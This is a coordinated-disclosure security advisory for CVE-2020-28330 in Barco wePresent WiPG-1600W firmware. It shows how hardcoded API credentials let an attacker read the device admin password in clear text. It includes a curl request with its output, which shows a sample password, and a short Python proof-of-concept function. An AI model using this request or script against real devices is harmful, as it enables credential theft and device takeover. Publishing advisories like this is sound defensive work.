Barco wePresent WiPG-1600W Admin Credential Exposure Vulnerability

Title: Barco wePresent Admin Credentials Exposed In Plain-text
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2020-005.txt


1. Vulnerability Details

     Affected Vendor: Barco
     Affected Product: wePresent WiPG-1600W
     Affected Version: 2.5.1.8
     Platform: Embedded Linux
     CWE Classification: CWE-523: Unprotected Transport of Credentials
     CVE ID: CVE-2020-28330


2. Vulnerability Description

     An attacker armed with hardcoded API credentials from
     KL-001-2020-004 (CVE-2020-28329) can issue an authenticated
     query to display the admin password for the main web user
     interface listening on port 443/tcp.


3. Technical Description

     An authenticated request using the hardcoded credentials in
     KL-001-2020-004 (CVE-2020-28329) to https://<IP>:4001/w1.0
     will display the current admin password in clear text. An
     attacker will now have the admin password on the device, and
     can use the web interface to make any configuration changes
     to the device using the web UI.

     $ curl -k -u 'admin:[REDACTED]'
     https://192.168.2.200:4001/w1.0 { "status": 200, "message":
     "Get successful", "data": { "key": "/w1.0", "value": {
                 "ClientAccess":{
                     "EnableAirplay": true
                 }, "Configuration":{
                     "RestartSystem": false, "ShutdownSystem": false,
                     "SetAction": "NoAction", "SetActionUrl": ""
                 }, "DeviceInfo":{
             "ArticleNumber": "Barco_Number",
             "CurrentUptime": 58524, "InUse": false,
             "ModelName": "WiPG-1600", "Sharing": false,
             "Status": 0, "StatusMessage": "", "TotalUptime":
             473871262, "TotalUsers": 0, "LoginCodeOption":
             "Random", "LoginCode": "3746", "SystemPassword":
             "W3Pr3s3nt",          <- Admin password
     ...  ...


4. Mitigation and Remediation Recommendation

     The vendor has released an updated firmware (2.5.3.12) which
     remediates the described vulnerability. Firmware and release
     notes are available at:

     https://www.barco.com/en/support/software/R33050104


5. Credit

     This vulnerability was discovered by Jim Becher (@jimbecher) of
     KoreLogic, Inc.


6. Disclosure Timeline

     2020.08.24 - KoreLogic submits vulnerability details to
                  Barco.
     2020.08.25 - Barco acknowledges receipt and the intention
                  to investigate.
     2020.09.21 - Barco notifies KoreLogic that this issue,
                  along with several others reported by KoreLogic,
                  will require more than the standard 45 business
                  day remediation timeline. Barco requests to delay
                  coordinated disclosure until 2020.12.11.
     2020.09.23 - KoreLogic agrees to 2020.12.11 coordinated disclosure.
     2020.09.25 - Barco informs KoreLogic of their intent to acquire
                  CVE number for this vulnerability.
     2020.11.09 - Barco shares CVE number with KoreLogic and announces
                  their intention to release the updated firmware
                  ahead of schedule, on 2020.11.11. Request that KoreLogic
                  delay public disclosure until 2020.11.20.
     2020.11.11 - Barco firmware release.
     2020.11.20 - KoreLogic public disclosure.


7. Proof of Concept

     The following is a basic Python function to return the admin password:
     
     def get_admin_pw(host, port, adminpw):
         apiuser = "admin"
         apipw = "[REDACTED]"
         url = "https://" + host + ":" + port + "/w1.0"
         response = requests.get(url, auth=HTTPBasicAuth(apiuser, apipw), verify=False, timeout=3)
         dict = response.json()
         adminpw = dict['data']['value']['DeviceInfo']['SystemPassword']
         return adminpw